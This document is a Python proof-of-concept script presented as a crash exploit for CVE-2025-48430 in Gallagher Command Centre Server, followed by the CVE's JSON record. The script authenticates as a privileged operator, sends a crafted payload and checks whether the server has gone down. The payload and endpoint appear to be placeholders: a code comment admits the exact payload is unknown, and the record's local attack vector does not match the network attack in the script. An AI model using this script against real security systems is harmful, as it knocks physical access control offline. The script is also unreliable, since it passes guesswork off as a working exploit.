CVE-2025-48430

# CVE-2025-48430 PoC - Gallagher Command Centre Server Crash # This PoC demonstrates how to trigger the uncaught exception # Requires valid credentials with privileged operator access import requests import json import sys TARGET_HOST = "https://target-command-centre-server" API_ENDPOINT = "/api/v1/commands/execute" def exploit_cve_2025_48430(target_url, username, password): """ Attempt to trigger the uncaught exception in Command Centre Server """ session = requests.Session() # Step 1: Authenticate with valid credentials login_url = f"{target_url}/api/v1/auth/login" login_data = { "username": username, "password": password } try: login_response = session.post(login_url, json=login_data, verify=False, timeout=10) if login_response.status_code != 200: print(f"[-] Authentication failed: {login_response.status_code}") return False print("[+] Successfully authenticated") token = login_response.json().get('token') headers = { 'Authorization': f'Bearer {token}', 'Content-Type': 'application/json' } # Step 2: Send malicious payload to trigger uncaught exception # The exact payload depends on the vulnerable endpoint exploit_payload = { "command": "trigger_crash", "parameters": { "type": "malformed_input", "data": "\x00\x00\x00" * 100 } } print("[*] Sending exploit payload to trigger uncaught exception...") exploit_response = session.post( f"{target_url}{API_ENDPOINT}", headers=headers, json=exploit_payload, timeout=10 ) # Step 3: Verify server crash health_check = session.get(f"{target_url}/api/v1/health", timeout=5) if health_check.status_code != 200: print("[+] Server appears to be crashed/unresponsive") return True else: print("[-] Server still responding, exploit may have failed") return False except requests.exceptions.RequestException as e: print(f"[+] Server unreachable - likely crashed: {e}") return True if __name__ == "__main__": if len(sys.argv) != 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] exploit_cve_2025_48430(target, user, pwd)

{"cve": {"id": "CVE-2025-48430", "sourceIdentifier": "[email protected]", "published": "2025-10-23T04:16:40.743", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Uncaught Exception (CWE-248) in the Command Centre Server allows an Authorized and Privileged Operator to crash the Command Centre Server at will.\n\nThis issue affects Command Centre Server: \n\n9.30 prior to vEL9.30.2482 (MR2), 9.20 prior to vEL9.20.2819 (MR4), 9.10 prior to vEL9.10.3672 (MR7), 9.00 prior to vEL9.00.3831 (MR8), all versions of 8.90 and prior."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-248"}]}], "references": [{"url": "https://security.gallagher.com/en-NZ/Security-Advisories/CVE-2025-48430", "source": "[email protected]"}]}}